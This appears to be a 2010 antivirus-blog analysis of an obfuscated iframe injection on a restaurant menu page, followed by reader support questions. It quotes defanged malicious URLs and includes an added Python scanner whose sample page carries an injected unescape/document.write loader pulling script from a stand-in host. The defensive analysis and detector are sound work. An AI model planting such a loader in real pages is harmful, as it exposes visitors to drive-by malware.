
March 19th, 2010

Would you like an iframe, sir?

Yesterday, when I was about to get something to eat, my attempt to check a menu online ended up with a warning about HTML:Iframe-LZ. Well, that’s quite spicy content for a common daily menu. So, let’s look at what’s under the hood.

Starter: a piece of JavaScript at the end of the page, served in a nicely roasted layer of obfuscation, really delicious.

[image: delicious script]

Main course: you can choose either a speciality of Chinese cuisine delivered by hxxp://b.nt002.cn/E/J.JS (fortunately already down) or a Russian shashlik that contains some popular ingredients (such as google, classmates or linkhelper) in the following order: hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru: 8080/ocn.ne.jp/ocn.ne.jp/ classmates.com/linkhelper.cn/google.com/ (also down already, but both of these links belong to a Gumblar system).

Dessert: a nice little snippet that carries out the execution of all the malcode.

[image: cake & coffee]

Anyone else hungry out there? :-)
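The post describes the two ingredients a defender would look for on a compromised page: an obfuscated script appended at the very end of the document and hidden iframes pulling content from unrelated hosts. The following heuristic scanner is an added example written for this page, not avast!'s engine or Michal's code; the sample menu page, the host names (`*.example`, `example.com`) and the scoring thresholds are constructed for illustration.

```python
"""Heuristic scan of an HTML document for the injection pattern described
in the post: an obfuscated <script> appended after the page body and hidden
<iframe> elements pointing at third-party hosts. Added example; the page
content and host names below are constructed, not real indicators."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tokens that by themselves are legitimate but cluster in packed loaders.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(")
# Eight or more consecutive %XX or \xXX escapes is typical of packed payloads.
ESCAPE_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}){8,}|(?:\\x[0-9a-fA-F]{2}){8,}")


class _Collector(HTMLParser):
    """Collects iframe attributes and inline script bodies, and remembers
    whether each script appeared after </body> (the 'end of page' spot)."""

    def __init__(self):
        super().__init__()
        self.iframes = []          # list of attribute dicts
        self.scripts = []          # list of (body, after_body_close)
        self.body_closed = False
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "body":
            self.body_closed = True
        elif tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append(("".join(self._buf), self.body_closed))


def is_hidden(attrs):
    """True if the iframe is styled away or sized to 0/1 pixels."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    width = (attrs.get("width") or "").strip()
    height = (attrs.get("height") or "").strip()
    return ("display:none" in style or "visibility:hidden" in style
            or width in ("0", "1") or height in ("0", "1"))


def obfuscation_score(body):
    """Count obfuscation markers plus long escape runs in a script body."""
    score = sum(body.count(m) for m in OBFUSCATION_MARKERS)
    score += len(ESCAPE_RUN.findall(body))
    return score


def scan_html(html, page_host):
    """Return a list of (finding, detail) tuples for one HTML document."""
    findings = []
    p = _Collector()
    p.feed(html)
    p.close()
    for attrs in p.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or ""
        if host and host != page_host and is_hidden(attrs):
            findings.append(("hidden-third-party-iframe", src))
    for body, late in p.scripts:
        if late:
            findings.append(("script-after-body-close", body[:40]))
        if obfuscation_score(body) >= 2:
            findings.append(("obfuscated-inline-script", body[:40]))
    return findings


# Constructed sample: a menu page with one legitimate embed, then an injected
# unescape/document.write loader and a 0x0 iframe appended after </html>.
SAMPLE_PAGE = """<html><body>
<h1>Today's menu</h1>
<iframe src="https://maps.example.com/embed?id=1" width="400" height="300"></iframe>
</body></html>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fbad.example%2Fx.js%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E'));</script>
<iframe src="http://other.example/ad" width="0" height="0" style="display:none"></iframe>
"""


def scan_sample():
    """Scan the constructed sample as if it were served from menu.example.com."""
    return scan_html(SAMPLE_PAGE, "menu.example.com")


if __name__ == "__main__":
    for kind, detail in scan_sample():
        print(f"{kind}: {detail}")
```

The visible map embed is not reported because it is neither hidden nor appended after the body; the injected loader trips both the position check and the obfuscation score, and the zero-sized third-party iframe is reported on its own. Thresholds like these produce false positives on legitimately minified pages, so they are a triage signal, not a verdict.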

Categories: analyses, Virus Lab
  1. March 20th, 2010 at 05:52 | #1

    Michal,

    I am always hungry to learn from you guys…

    Please teach me more…and more….

    cheers,

  2. March 20th, 2010 at 05:59 | #2

    Hi Michal,

    I don’t see avast! blocking one of your referenced sites, like:

    hxxp://www.unmaskparasites.com/security-report/?page=www.duowan.com/0910/119283364074.html

    When I opened it, nothing happened with avast!, even though it is detected that this site contains some suspicious links.

    cheers,
    yanto chiang

  3. Chocobollz
    March 20th, 2010 at 13:06 | #3

    Hi there, in one of your posts (here: http://blog.avast.com/2010/02/18/ads-poisoning-–-jsprontexi/ ), there’s someone asking this question:

    Dawn :
    Do you need the web shield for this? I disabled that function because it worsened my surfing speed. I only use File System Shield and Behavior Shield.

    I would like to know it too: do we need to activate the webshield to detect those JS viruses or not? I ask this because I myself usually turn the webshield off because it interferes with my firewall.

    Best regards.

  4. March 21st, 2010 at 18:15 | #4

    @Yanto Chiang
    I’m not certain whether duowan.com is really related to any of my references, because they were unreachable when I tried them.

  5. March 21st, 2010 at 18:22 | #5

    @Chocobollz
    This infection was caught by the Web shield. I can only suggest that you turn it on, because the vast majority of malware attacks come from the internet/surfing nowadays. Some issues with slow browsing while having the web shield turned on are currently discussed here: http://forum.avast.com/index.php?topic=56694.0

  6. March 22nd, 2010 at 04:25 | #6

    Michal Krejdl :
    @Yanto Chiang
    I’m not certain whether duowan.com is really related to any of my references, because they were unreachable when I tried them.

    Hi Michal,

    It’s okay,

    I randomly analyzed your referenced link.
    Anyway, nice article to share with us… keep going forth to contribute on security issues in the IT world.

    cheers,
    yanto chiang

  7. Chocobollz
    March 22nd, 2010 at 08:14 | #7

    @Michal Krejdl
    Thank you for your reply. Anyway, speed isn’t the issue for me; the problem is, if I turn the webshield on, it makes my firewall (Outpost Firewall Pro) become ineffective. I mean, all of the connection requests made by the browser are shown as coming from the webshield, not the browser itself, so it kind of makes my firewall useless, as it cannot apply restrictions based on individual applications. I just hope that Avast would place its scanner after the firewall, not before it. That would likely solve the problem.

  8. March 22nd, 2010 at 13:07 | #8

    Chocobollz :

    @Michal Krejdl
    Thank you for your reply. Anyway, speed isn’t the issue for me; the problem is, if I turn the webshield on, it makes my firewall (Outpost Firewall Pro) become ineffective. I mean, all of the connection requests made by the browser are shown as coming from the webshield, not the browser itself, so it kind of makes my firewall useless, as it cannot apply restrictions based on individual applications. I just hope that Avast would place its scanner after the firewall, not before it. That would likely solve the problem.

    Hello,
    The Webshield acts as an HTTP proxy, so all traffic goes through the webshield to the internet. We recommend that you use our built-in firewall in Avast Internet Security.

  9. March 28th, 2010 at 13:59 | #9

    Hi,
    Sorry for posting here, but I have a problem I don’t know how to solve.

    I am using Comodo Dragon as my default browser, and when I check my Avast settings I can’t see any activity in the webshield. Comodo Dragon is a very new browser, but it’s similar to Google Chrome. The webshield does not scan when I am surfing the web.
    But the Avast scanner is scanning my network traffic even if I use Comodo Dragon, and when I switch to Internet Explorer 8 everything works as it should.
    I don’t want to be unprotected when I surf the web using Comodo. Can you please give me an explanation?
    Sorry, I forgot to say that I am running Comodo Dragon and Avast with Windows 7 Ultimate x86.
    Sorry for my bad English.

  10. March 29th, 2010 at 02:33 | #10

    Avast, I would like there to be an online technical support service, more security.

  11. March 29th, 2010 at 12:32 | #11

    Magnus Johansson :

    Hi,
    Sorry for posting here, but I have a problem I don’t know how to solve.

    I am using Comodo Dragon as my default browser, and when I check my Avast settings I can’t see any activity in the webshield. Comodo Dragon is a very new browser, but it’s similar to Google Chrome. The webshield does not scan when I am surfing the web.
    But the Avast scanner is scanning my network traffic even if I use Comodo Dragon, and when I switch to Internet Explorer 8 everything works as it should.
    I don’t want to be unprotected when I surf the web using Comodo. Can you please give me an explanation?
    Sorry, I forgot to say that I am running Comodo Dragon and Avast with Windows 7 Ultimate x86.
    Sorry for my bad English.

    Hello,
    please leave us a ticket on support.avast.com so we can handle your problem effectively and track our communication. Meanwhile I am going to test the browser.

  12. March 29th, 2010 at 13:51 | #12

    @Magnus Johansson
    Hello,
    good news, Magnus.
    Within the next 48 hours you will receive a new VPS update and the Avast Webshield will scan the Comodo Dragon packets. So just keep your VPS updates running.

  13. spg SCOTT
    March 29th, 2010 at 15:32 | #13

    @Vojta – Avast support team

    Interesting, there was a question about this on the forum…

    So the OptinProcess will not be needed anymore?

    The thread: http://forum.avast.com/index.php?topic=57721

    -Scott-

  14. GW Anderson
    March 29th, 2010 at 17:26 | #14

    Thank you for today’s (29 March, 2010) blog “Why does http://www.avast.eu take me to the Avira website?…..or isn’t security built on trust?”

    I have my own problems with Avira. It is helpful to know this information in order that I may help those who truly want avast! Do not be misled. You are correct. Trust is very important.

    Thank you again.

    GWA

  15. March 29th, 2010 at 17:49 | #15

    @GW Anderson
    This domain has been owned by Avira since 2006. Our official domain is avast.com.

  16. GW Anderson
    March 29th, 2010 at 18:14 | #16

    Thank you. I do not understand the RSS feed which I mentioned in the above note which came this morning.

  17. March 29th, 2010 at 20:22 | #17

    @GW Anderson
    Oh, now I can see it. I was a bit confused, because the article is not available except in those RSS readers that caught it.

  18. GW Anderson
    March 29th, 2010 at 21:24 | #18

    Was the article withdrawn? When I went to the website to view the complete article, I was ‘welcomed’ to the Error 404 page.

    Thanks for responding.

  19. April 1st, 2010 at 23:24 | #20

    @Vojta – Avast support team.
    Comodo still doesn’t work with Avast 5.0. I have reinstalled Avast as you suggested and I also reinstalled Comodo. Can you solve this, or I am considering uninstalling Avast and trying something else.
    @Scott. I modified the .ini file and it did the trick, but why should I need to do that? This bug in Avast or Comodo can’t be impossible to fix. I have been in contact with both Avast support and Comodo support and both said the problem is solved. Is it me and my computer, or what?

  20. spg SCOTT
    April 2nd, 2010 at 12:33 | #21

    @magnus johansson

    It is not necessarily a bug in either.
    As far as I know, there is a list of browsers that are scanned by default (e.g. IE, Fx, the other mainstream browsers) and Dragon is not currently on that list.

    I am not quite sure as to why this is but it is the way that it is done.

    The INI modification is a workaround of sorts, and adds dragon to be scanned.

    The way I see it is that Dragon is not so well known to the ALWIL devs and so they have to look into it before it gets scanned.

    It was initially also the same with Chrome, but now it is supported by default.

    -Scott-

    p.s. Glad the thread helped :)

  21. April 3rd, 2010 at 01:10 | #22

    Problem solved.
    The latest VPS update did the trick. Feels so good!
    Thanks everyone who helped me with this especially @Scott and @Vojta – Avast support team

  22. spg SCOTT
    April 3rd, 2010 at 13:50 | #23

    You’re Welcome :)

  23. April 6th, 2010 at 10:54 | #24

    spg SCOTT :

    @Vojta – Avast support team

    Interesting, there was a question about this on the forum…

    So the OptinProcess will not be needed anymore?

    The thread: http://forum.avast.com/index.php?topic=57721

    -Scott-

    Hello,
    it is already in the Avast code, so there is no need to add it manually.

  24. spg SCOTT
    April 6th, 2010 at 15:26 | #25

    @Vojta – Avast support team
    Hi,

    Yes, I saw that in the thread and in Magnus Johansson’s post :D

    -Scott-

  25. spg SCOTT
    April 6th, 2010 at 15:28 | #26

    @Vojta – Avast support team
    As a side note, maybe the knowledge-base article on the subject could be updated for version 5?

  26. Mario
    April 6th, 2010 at 15:35 | #27

    Hi, Trend Micro detected this website hxxp://www.swfcabin.com/open/1243702443 as malware and I went on the website on my home computer and I’m scared my computer is infected with the malware. Can you get avast! Home, the free antivirus, to detect it please? I’m begging you, I’m very scared and I just paid $100 dollars to have my computer fixed, so please get avast! Home, the free antivirus version, to detect the malware. So please get avast! Home, the free antivirus, to detect it.

  27. April 7th, 2010 at 15:15 | #28

    @spg SCOTT
    Do you mean an article about this particular browser or a general note about adding a browser into the webshield?

  28. spg SCOTT
    April 8th, 2010 at 17:03 | #29

    I was thinking about this one:
    http://support.avast.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=374

    Maybe it could be updated to include the ones that are scanned in V5

    And possibly have it show how to optin one that is not scanned?

    -Scott-

  29. April 9th, 2010 at 15:47 | #30

    @spg SCOTT
    Hello Scott,
    it will be updated.

  30. spg SCOTT
    April 10th, 2010 at 20:18 | #31

    @Vojta – Avast support team

    Cool, Thanks :)

    The more knowledgebase articles we have, the better ;)

    -Scott-

  31. April 14th, 2010 at 01:59 | #32

    Please cancel my avast anti-virus and e-mail me the results of cancelling this system from my computer.

    Patti
    2YA7

  32. April 14th, 2010 at 02:02 | #33

    Please notify me of system being off my computer. There is no cancelling information and I no longer want it on my computer. E-mail me these results of no longer having avast on my computer. As soon as possible I want it off my computer, and a response from you. Send response to psasala@verizon.net
    Thank You,
    Patti Sasala
